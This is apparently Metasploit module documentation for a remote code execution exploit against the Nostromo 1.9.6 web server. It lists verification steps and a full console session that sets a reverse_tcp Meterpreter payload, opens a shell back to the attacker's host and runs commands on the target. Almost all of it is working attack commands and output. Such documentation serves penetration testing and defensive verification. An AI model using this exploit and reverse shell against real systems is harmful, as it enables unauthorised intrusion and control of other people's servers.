Quentin Kaiser
1.8 KiB
1.8 KiB
Vulnerable Application
Verified against:
- Nostromo 1.9.6 on Linux
Nostrom sources can be downloaded from http://www.nazgul.ch/dev_nostromo.html
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/http/nostromo_code_exec - Do:
set rport <port> - Do:
set rhost <ip> - Do:
check - Do:
set payload linux/x86/meterpreter/reverse_tcp - Do:
set lhost <ip> - Do:
exploit - You should get a shell.
Scenarios
Example utilizing nostromo 1.9.6 on Ubuntu Linux.
msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set rhosts 192.168.1.9
rhosts => 192.168.1.9
msf5 exploit(multi/http/nostromo_code_exec) > set rport 8000
rport => 8000
msf5 exploit(multi/http/nostromo_code_exec) > check
[+] Version: nostromo 1.9.6
[+] 192.168.1.9:8000 - The target is vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 0
target => 0
msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf5 exploit(multi/http/nostromo_code_exec) > run
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Sending stage (985320 bytes) to 192.168.1.10
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.9:52374) at 2019-10-21 21:12:22 +0200
[*] Command Stager progress - 100.00% done (763/763 bytes)
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer : nostromo.local
OS : Ubuntu 18.04 (Linux 4.15.0-62-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...